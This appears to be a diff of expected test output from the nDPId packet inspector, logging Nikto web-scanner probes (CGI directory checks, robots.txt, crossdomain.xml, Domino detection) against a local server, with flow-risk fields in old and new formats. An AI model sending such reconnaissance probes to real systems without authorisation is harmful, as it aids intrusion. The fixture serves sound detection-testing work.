-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}}
+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
